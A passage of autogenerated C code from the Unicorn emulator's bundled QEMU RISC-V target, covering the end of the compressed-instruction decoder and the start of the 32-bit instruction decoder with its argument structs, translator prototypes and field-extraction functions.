/home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:124 */ decode_insn16_extract_c_mv(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* 1001.... ......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10010000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:127 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_ebreak(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1001.... .0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:128 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 1; if (trans_jalr(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:129 */ decode_insn16_extract_cr(ctx, &u.f_r, insn); if (trans_add(ctx, &u.f_r)) return true; return false; } return false; case 0x0000a000: /* 101..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:92 */ decode_insn16_extract_cs_d(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000a001: /* 101..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:110 */ decode_insn16_extract_cj(ctx, &u.f_j, insn); u.f_j.rd = 0; if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x0000a002: /* 101..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:131 */ decode_insn16_extract_c_sdsp(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000c000: /* 110..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:93 */ decode_insn16_extract_cs_w(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000c001: /* 110..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:111 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x0000c002: /* 110..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:132 */ decode_insn16_extract_c_swsp(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000e000: /* 111..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:21 */ decode_insn16_extract_cs_d(ctx, &u.f_s, insn); if (trans_sd(ctx, &u.f_s)) return true; return false; case 0x0000e001: /* 111..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:112 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x0000e002: /* 111..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-64.decode:36 */ decode_insn16_extract_c_sdsp(ctx, &u.f_s, insn); if (trans_sd(ctx, &u.f_s)) return true; return false; } return false; } �������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/riscv64/decode_insn32.inc.c�����������������������������������������0000664�0000000�0000000�00000230104�14675241067�0023422�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int aq; int rd; int rl; int rs1; int rs2; } arg_atomic; typedef struct { int imm; int rs1; int rs2; } arg_b; typedef struct { int rd; int rm; int rs1; int rs2; int rs3; } arg_decode_insn3210; typedef struct { int rd; int rm; int rs1; int rs2; } arg_decode_insn3211; typedef struct { int rd; int rm; int rs1; } arg_decode_insn3212; typedef struct { int rd; int rs1; } arg_decode_insn3213; typedef struct { int rs1; int rs2; } arg_decode_insn3214; typedef struct { int rs1; } arg_decode_insn3215; typedef struct { int pred; int succ; } arg_decode_insn3216; typedef struct { int csr; int rd; int rs1; } arg_decode_insn329; typedef struct { #ifdef _MSC_VER int dummy; // MSVC does not allow empty struct #endif } arg_empty; typedef struct { int imm; int rd; int rs1; } arg_i; typedef struct { int imm; int rd; } arg_j; typedef struct { int rd; int rs1; int rs2; } arg_r; typedef struct { int imm; int rs1; int rs2; } arg_s; typedef struct { int rd; int rs1; int shamt; } arg_shift; typedef struct { int imm; int rd; } arg_u; typedef arg_empty arg_ecall; static bool trans_ecall(DisasContext *ctx, arg_ecall *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_empty arg_uret; static bool trans_uret(DisasContext *ctx, arg_uret *a); typedef arg_empty arg_sret; static bool trans_sret(DisasContext *ctx, arg_sret *a); typedef arg_empty arg_mret; static bool trans_mret(DisasContext *ctx, arg_mret *a); typedef arg_empty arg_wfi; static bool trans_wfi(DisasContext *ctx, arg_wfi *a); typedef arg_decode_insn3214 arg_hfence_gvma; static bool trans_hfence_gvma(DisasContext *ctx, arg_hfence_gvma *a); typedef arg_decode_insn3214 arg_hfence_bvma; static bool trans_hfence_bvma(DisasContext *ctx, arg_hfence_bvma *a); typedef arg_decode_insn3214 arg_sfence_vma; static bool trans_sfence_vma(DisasContext *ctx, arg_sfence_vma *a); typedef arg_decode_insn3215 arg_sfence_vm; static bool trans_sfence_vm(DisasContext *ctx, arg_sfence_vm *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_u arg_auipc; static bool trans_auipc(DisasContext *ctx, arg_auipc *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_b arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_b arg_blt; static bool trans_blt(DisasContext *ctx, arg_blt *a); typedef arg_b arg_bge; static bool trans_bge(DisasContext *ctx, arg_bge *a); typedef arg_b arg_bltu; static bool trans_bltu(DisasContext *ctx, arg_bltu *a); typedef arg_b arg_bgeu; static bool trans_bgeu(DisasContext *ctx, arg_bgeu *a); typedef arg_i arg_lb; static bool trans_lb(DisasContext *ctx, arg_lb *a); typedef arg_i arg_lh; static bool trans_lh(DisasContext *ctx, arg_lh *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_i arg_lbu; static bool trans_lbu(DisasContext *ctx, arg_lbu *a); typedef arg_i arg_lhu; static bool trans_lhu(DisasContext *ctx, arg_lhu *a); typedef arg_s arg_sb; static bool trans_sb(DisasContext *ctx, arg_sb *a); typedef arg_s arg_sh; static bool trans_sh(DisasContext *ctx, arg_sh *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_slti; static bool trans_slti(DisasContext *ctx, arg_slti *a); typedef arg_i arg_sltiu; static bool trans_sltiu(DisasContext *ctx, arg_sltiu *a); typedef arg_i arg_xori; static bool trans_xori(DisasContext *ctx, arg_xori *a); typedef arg_i arg_ori; static bool trans_ori(DisasContext *ctx, arg_ori *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_sll; static bool trans_sll(DisasContext *ctx, arg_sll *a); typedef arg_r arg_slt; static bool trans_slt(DisasContext *ctx, arg_slt *a); typedef arg_r arg_sltu; static bool trans_sltu(DisasContext *ctx, arg_sltu *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_srl; static bool trans_srl(DisasContext *ctx, arg_srl *a); typedef arg_r arg_sra; static bool trans_sra(DisasContext *ctx, arg_sra *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_decode_insn3216 arg_fence; static bool trans_fence(DisasContext *ctx, arg_fence *a); typedef arg_empty arg_fence_i; static bool trans_fence_i(DisasContext *ctx, arg_fence_i *a); typedef arg_decode_insn329 arg_csrrw; static bool trans_csrrw(DisasContext *ctx, arg_csrrw *a); typedef arg_decode_insn329 arg_csrrs; static bool trans_csrrs(DisasContext *ctx, arg_csrrs *a); typedef arg_decode_insn329 arg_csrrc; static bool trans_csrrc(DisasContext *ctx, arg_csrrc *a); typedef arg_decode_insn329 arg_csrrwi; static bool trans_csrrwi(DisasContext *ctx, arg_csrrwi *a); typedef arg_decode_insn329 arg_csrrsi; static bool trans_csrrsi(DisasContext *ctx, arg_csrrsi *a); typedef arg_decode_insn329 arg_csrrci; static bool trans_csrrci(DisasContext *ctx, arg_csrrci *a); typedef arg_r arg_mul; static bool trans_mul(DisasContext *ctx, arg_mul *a); typedef arg_r arg_mulh; static bool trans_mulh(DisasContext *ctx, arg_mulh *a); typedef arg_r arg_mulhsu; static bool trans_mulhsu(DisasContext *ctx, arg_mulhsu *a); typedef arg_r arg_mulhu; static bool trans_mulhu(DisasContext *ctx, arg_mulhu *a); typedef arg_r arg_div; static bool trans_div(DisasContext *ctx, arg_div *a); typedef arg_r arg_divu; static bool trans_divu(DisasContext *ctx, arg_divu *a); typedef arg_r arg_rem; static bool trans_rem(DisasContext *ctx, arg_rem *a); typedef arg_r arg_remu; static bool trans_remu(DisasContext *ctx, arg_remu *a); typedef arg_atomic arg_lr_w; static bool trans_lr_w(DisasContext *ctx, arg_lr_w *a); typedef arg_atomic arg_sc_w; static bool trans_sc_w(DisasContext *ctx, arg_sc_w *a); typedef arg_atomic arg_amoswap_w; static bool trans_amoswap_w(DisasContext *ctx, arg_amoswap_w *a); typedef arg_atomic arg_amoadd_w; static bool trans_amoadd_w(DisasContext *ctx, arg_amoadd_w *a); typedef arg_atomic arg_amoxor_w; static bool trans_amoxor_w(DisasContext *ctx, arg_amoxor_w *a); typedef arg_atomic arg_amoand_w; static bool trans_amoand_w(DisasContext *ctx, arg_amoand_w *a); typedef arg_atomic arg_amoor_w; static bool trans_amoor_w(DisasContext *ctx, arg_amoor_w *a); typedef arg_atomic arg_amomin_w; static bool trans_amomin_w(DisasContext *ctx, arg_amomin_w *a); typedef arg_atomic arg_amomax_w; static bool trans_amomax_w(DisasContext *ctx, arg_amomax_w *a); typedef arg_atomic arg_amominu_w; static bool trans_amominu_w(DisasContext *ctx, arg_amominu_w *a); typedef arg_atomic arg_amomaxu_w; static bool trans_amomaxu_w(DisasContext *ctx, arg_amomaxu_w *a); typedef arg_i arg_flw; static bool trans_flw(DisasContext *ctx, arg_flw *a); typedef arg_s arg_fsw; static bool trans_fsw(DisasContext *ctx, arg_fsw *a); typedef arg_decode_insn3210 arg_fmadd_s; static bool trans_fmadd_s(DisasContext *ctx, arg_fmadd_s *a); typedef arg_decode_insn3210 arg_fmsub_s; static bool trans_fmsub_s(DisasContext *ctx, arg_fmsub_s *a); typedef arg_decode_insn3210 arg_fnmsub_s; static bool trans_fnmsub_s(DisasContext *ctx, arg_fnmsub_s *a); typedef arg_decode_insn3210 arg_fnmadd_s; static bool trans_fnmadd_s(DisasContext *ctx, arg_fnmadd_s *a); typedef arg_decode_insn3211 arg_fadd_s; static bool trans_fadd_s(DisasContext *ctx, arg_fadd_s *a); typedef arg_decode_insn3211 arg_fsub_s; static bool trans_fsub_s(DisasContext *ctx, arg_fsub_s *a); typedef arg_decode_insn3211 arg_fmul_s; static bool trans_fmul_s(DisasContext *ctx, arg_fmul_s *a); typedef arg_decode_insn3211 arg_fdiv_s; static bool trans_fdiv_s(DisasContext *ctx, arg_fdiv_s *a); typedef arg_decode_insn3212 arg_fsqrt_s; static bool trans_fsqrt_s(DisasContext *ctx, arg_fsqrt_s *a); typedef arg_r arg_fsgnj_s; static bool trans_fsgnj_s(DisasContext *ctx, arg_fsgnj_s *a); typedef arg_r arg_fsgnjn_s; static bool trans_fsgnjn_s(DisasContext *ctx, arg_fsgnjn_s *a); typedef arg_r arg_fsgnjx_s; static bool trans_fsgnjx_s(DisasContext *ctx, arg_fsgnjx_s *a); typedef arg_r arg_fmin_s; static bool trans_fmin_s(DisasContext *ctx, arg_fmin_s *a); typedef arg_r arg_fmax_s; static bool trans_fmax_s(DisasContext *ctx, arg_fmax_s *a); typedef arg_decode_insn3212 arg_fcvt_w_s; static bool trans_fcvt_w_s(DisasContext *ctx, arg_fcvt_w_s *a); typedef arg_decode_insn3212 arg_fcvt_wu_s; static bool trans_fcvt_wu_s(DisasContext *ctx, arg_fcvt_wu_s *a); typedef arg_decode_insn3213 arg_fmv_x_w; static bool trans_fmv_x_w(DisasContext *ctx, arg_fmv_x_w *a); typedef arg_r arg_feq_s; static bool trans_feq_s(DisasContext *ctx, arg_feq_s *a); typedef arg_r arg_flt_s; static bool trans_flt_s(DisasContext *ctx, arg_flt_s *a); typedef arg_r arg_fle_s; static bool trans_fle_s(DisasContext *ctx, arg_fle_s *a); typedef arg_decode_insn3213 arg_fclass_s; static bool trans_fclass_s(DisasContext *ctx, arg_fclass_s *a); typedef arg_decode_insn3212 arg_fcvt_s_w; static bool trans_fcvt_s_w(DisasContext *ctx, arg_fcvt_s_w *a); typedef arg_decode_insn3212 arg_fcvt_s_wu; static bool trans_fcvt_s_wu(DisasContext *ctx, arg_fcvt_s_wu *a); typedef arg_decode_insn3213 arg_fmv_w_x; static bool trans_fmv_w_x(DisasContext *ctx, arg_fmv_w_x *a); typedef arg_i arg_fld; static bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_decode_insn3210 arg_fmadd_d; static bool trans_fmadd_d(DisasContext *ctx, arg_fmadd_d *a); typedef arg_decode_insn3210 arg_fmsub_d; static bool trans_fmsub_d(DisasContext *ctx, arg_fmsub_d *a); typedef arg_decode_insn3210 arg_fnmsub_d; static bool trans_fnmsub_d(DisasContext *ctx, arg_fnmsub_d *a); typedef arg_decode_insn3210 arg_fnmadd_d; static bool trans_fnmadd_d(DisasContext *ctx, arg_fnmadd_d *a); typedef arg_decode_insn3211 arg_fadd_d; static bool trans_fadd_d(DisasContext *ctx, arg_fadd_d *a); typedef arg_decode_insn3211 arg_fsub_d; static bool trans_fsub_d(DisasContext *ctx, arg_fsub_d *a); typedef arg_decode_insn3211 arg_fmul_d; static bool trans_fmul_d(DisasContext *ctx, arg_fmul_d *a); typedef arg_decode_insn3211 arg_fdiv_d; static bool trans_fdiv_d(DisasContext *ctx, arg_fdiv_d *a); typedef arg_decode_insn3212 arg_fsqrt_d; static bool trans_fsqrt_d(DisasContext *ctx, arg_fsqrt_d *a); typedef arg_r arg_fsgnj_d; static bool trans_fsgnj_d(DisasContext *ctx, arg_fsgnj_d *a); typedef arg_r arg_fsgnjn_d; static bool trans_fsgnjn_d(DisasContext *ctx, arg_fsgnjn_d *a); typedef arg_r arg_fsgnjx_d; static bool trans_fsgnjx_d(DisasContext *ctx, arg_fsgnjx_d *a); typedef arg_r arg_fmin_d; static bool trans_fmin_d(DisasContext *ctx, arg_fmin_d *a); typedef arg_r arg_fmax_d; static bool trans_fmax_d(DisasContext *ctx, arg_fmax_d *a); typedef arg_decode_insn3212 arg_fcvt_s_d; static bool trans_fcvt_s_d(DisasContext *ctx, arg_fcvt_s_d *a); typedef arg_decode_insn3212 arg_fcvt_d_s; static bool trans_fcvt_d_s(DisasContext *ctx, arg_fcvt_d_s *a); typedef arg_r arg_feq_d; static bool trans_feq_d(DisasContext *ctx, arg_feq_d *a); typedef arg_r arg_flt_d; static bool trans_flt_d(DisasContext *ctx, arg_flt_d *a); typedef arg_r arg_fle_d; static bool trans_fle_d(DisasContext *ctx, arg_fle_d *a); typedef arg_decode_insn3213 arg_fclass_d; static bool trans_fclass_d(DisasContext *ctx, arg_fclass_d *a); typedef arg_decode_insn3212 arg_fcvt_w_d; static bool trans_fcvt_w_d(DisasContext *ctx, arg_fcvt_w_d *a); typedef arg_decode_insn3212 arg_fcvt_wu_d; static bool trans_fcvt_wu_d(DisasContext *ctx, arg_fcvt_wu_d *a); typedef arg_decode_insn3212 arg_fcvt_d_w; static bool trans_fcvt_d_w(DisasContext *ctx, arg_fcvt_d_w *a); typedef arg_decode_insn3212 arg_fcvt_d_wu; static bool trans_fcvt_d_wu(DisasContext *ctx, arg_fcvt_d_wu *a); typedef arg_i arg_lwu; static bool trans_lwu(DisasContext *ctx, arg_lwu *a); typedef arg_i arg_ld; static bool trans_ld(DisasContext *ctx, arg_ld *a); typedef arg_s arg_sd; static bool trans_sd(DisasContext *ctx, arg_sd *a); typedef arg_i arg_addiw; static bool trans_addiw(DisasContext *ctx, arg_addiw *a); typedef arg_shift arg_slliw; static bool trans_slliw(DisasContext *ctx, arg_slliw *a); typedef arg_shift arg_srliw; static bool trans_srliw(DisasContext *ctx, arg_srliw *a); typedef arg_shift arg_sraiw; static bool trans_sraiw(DisasContext *ctx, arg_sraiw *a); typedef arg_r arg_addw; static bool trans_addw(DisasContext *ctx, arg_addw *a); typedef arg_r arg_subw; static bool trans_subw(DisasContext *ctx, arg_subw *a); typedef arg_r arg_sllw; static bool trans_sllw(DisasContext *ctx, arg_sllw *a); typedef arg_r arg_srlw; static bool trans_srlw(DisasContext *ctx, arg_srlw *a); typedef arg_r arg_sraw; static bool trans_sraw(DisasContext *ctx, arg_sraw *a); typedef arg_r arg_mulw; static bool trans_mulw(DisasContext *ctx, arg_mulw *a); typedef arg_r arg_divw; static bool trans_divw(DisasContext *ctx, arg_divw *a); typedef arg_r arg_divuw; static bool trans_divuw(DisasContext *ctx, arg_divuw *a); typedef arg_r arg_remw; static bool trans_remw(DisasContext *ctx, arg_remw *a); typedef arg_r arg_remuw; static bool trans_remuw(DisasContext *ctx, arg_remuw *a); typedef arg_atomic arg_lr_d; static bool trans_lr_d(DisasContext *ctx, arg_lr_d *a); typedef arg_atomic arg_sc_d; static bool trans_sc_d(DisasContext *ctx, arg_sc_d *a); typedef arg_atomic arg_amoswap_d; static bool trans_amoswap_d(DisasContext *ctx, arg_amoswap_d *a); typedef arg_atomic arg_amoadd_d; static bool trans_amoadd_d(DisasContext *ctx, arg_amoadd_d *a); typedef arg_atomic arg_amoxor_d; static bool trans_amoxor_d(DisasContext *ctx, arg_amoxor_d *a); typedef arg_atomic arg_amoand_d; static bool trans_amoand_d(DisasContext *ctx, arg_amoand_d *a); typedef arg_atomic arg_amoor_d; static bool trans_amoor_d(DisasContext *ctx, arg_amoor_d *a); typedef arg_atomic arg_amomin_d; static bool trans_amomin_d(DisasContext *ctx, arg_amomin_d *a); typedef arg_atomic arg_amomax_d; static bool trans_amomax_d(DisasContext *ctx, arg_amomax_d *a); typedef arg_atomic arg_amominu_d; static bool trans_amominu_d(DisasContext *ctx, arg_amominu_d *a); typedef arg_atomic arg_amomaxu_d; static bool trans_amomaxu_d(DisasContext *ctx, arg_amomaxu_d *a); typedef arg_decode_insn3212 arg_fcvt_l_s; static bool trans_fcvt_l_s(DisasContext *ctx, arg_fcvt_l_s *a); typedef arg_decode_insn3212 arg_fcvt_lu_s; static bool trans_fcvt_lu_s(DisasContext *ctx, arg_fcvt_lu_s *a); typedef arg_decode_insn3212 arg_fcvt_s_l; static bool trans_fcvt_s_l(DisasContext *ctx, arg_fcvt_s_l *a); typedef arg_decode_insn3212 arg_fcvt_s_lu; static bool trans_fcvt_s_lu(DisasContext *ctx, arg_fcvt_s_lu *a); typedef arg_decode_insn3212 arg_fcvt_l_d; static bool trans_fcvt_l_d(DisasContext *ctx, arg_fcvt_l_d *a); typedef arg_decode_insn3212 arg_fcvt_lu_d; static bool trans_fcvt_lu_d(DisasContext *ctx, arg_fcvt_lu_d *a); typedef arg_decode_insn3213 arg_fmv_x_d; static bool trans_fmv_x_d(DisasContext *ctx, arg_fmv_x_d *a); typedef arg_decode_insn3212 arg_fcvt_d_l; static bool trans_fcvt_d_l(DisasContext *ctx, arg_fcvt_d_l *a); typedef arg_decode_insn3212 arg_fcvt_d_lu; static bool trans_fcvt_d_lu(DisasContext *ctx, arg_fcvt_d_lu *a); typedef arg_decode_insn3213 arg_fmv_d_x; static bool trans_fmv_d_x(DisasContext *ctx, arg_fmv_d_x *a); static void decode_insn32_extract_atom_ld(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = 0; a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_atom_st(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_b(DisasContext *ctx, arg_b *a, uint32_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(extract32(insn, 8, 4), 4, 28, extract32(insn, 25, 6)), 10, 22, extract32(insn, 7, 1)), 11, 21, sextract32(insn, 31, 1))); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_csr(DisasContext *ctx, arg_decode_insn329 *a, uint32_t insn) { a->csr = extract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_decode_insn32_Fmt_18(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void decode_insn32_extract_decode_insn32_Fmt_19(DisasContext *ctx, arg_decode_insn3216 *a, uint32_t insn) { a->pred = extract32(insn, 24, 4); a->succ = extract32(insn, 20, 4); } static void decode_insn32_extract_hfence_bvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_hfence_gvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_i(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = sextract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_j(DisasContext *ctx, arg_j *a, uint32_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(extract32(insn, 21, 10), 10, 22, extract32(insn, 20, 1)), 11, 21, extract32(insn, 12, 8)), 19, 13, sextract32(insn, 31, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2(DisasContext *ctx, arg_decode_insn3213 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2_rm(DisasContext *ctx, arg_decode_insn3212 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r4_rm(DisasContext *ctx, arg_decode_insn3210 *a, uint32_t insn) { a->rs3 = extract32(insn, 27, 5); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r_rm(DisasContext *ctx, arg_decode_insn3211 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_s(DisasContext *ctx, arg_s *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 7, 5), 5, 27, sextract32(insn, 25, 7)); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vm(DisasContext *ctx, arg_decode_insn3215 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sh(DisasContext *ctx, arg_shift *a, uint32_t insn) { a->shamt = extract32(insn, 20, 10); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_sh5(DisasContext *ctx, arg_shift *a, uint32_t insn) { a->shamt = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_u(DisasContext *ctx, arg_u *a, uint32_t insn) { a->imm = ex_shift_12(ctx, sextract32(insn, 12, 20)); a->rd = extract32(insn, 7, 5); } static bool decode_insn32(DisasContext *ctx, uint32_t insn) { union { arg_atomic f_atomic; arg_b f_b; arg_decode_insn3210 f_decode_insn3210; arg_decode_insn3211 f_decode_insn3211; arg_decode_insn3212 f_decode_insn3212; arg_decode_insn3213 f_decode_insn3213; arg_decode_insn3214 f_decode_insn3214; arg_decode_insn3215 f_decode_insn3215; arg_decode_insn3216 f_decode_insn3216; arg_decode_insn329 f_decode_insn329; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000007f) { case 0x00000003: /* ........ ........ ........ .0000011 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:96 */ if (trans_lb(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:97 */ if (trans_lh(ctx, &u.f_i)) return true; return false; case 0x2: /* ........ ........ .010.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:98 */ if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:28 */ if (trans_ld(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:99 */ if (trans_lbu(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:100 */ if (trans_lhu(ctx, &u.f_i)) return true; return false; case 0x6: /* ........ ........ .110.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:27 */ if (trans_lwu(ctx, &u.f_i)) return true; return false; } return false; case 0x00000007: /* ........ ........ ........ .0000111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:156 */ if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:184 */ if (trans_fld(ctx, &u.f_i)) return true; return false; } return false; case 0x0000000f: /* ........ ........ ........ .0001111 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:123 */ decode_insn32_extract_decode_insn32_Fmt_19(ctx, &u.f_decode_insn3216, insn); if (trans_fence(ctx, &u.f_decode_insn3216)) return true; return false; case 0x1: /* ........ ........ .001.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:124 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); if (trans_fence_i(ctx, &u.f_empty)) return true; return false; } return false; case 0x00000013: /* ........ ........ ........ .0010011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:104 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .001.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:110 */ if (trans_slli(ctx, &u.f_shift)) return true; return false; } return false; case 0x2: /* ........ ........ .010.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:105 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_slti(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:106 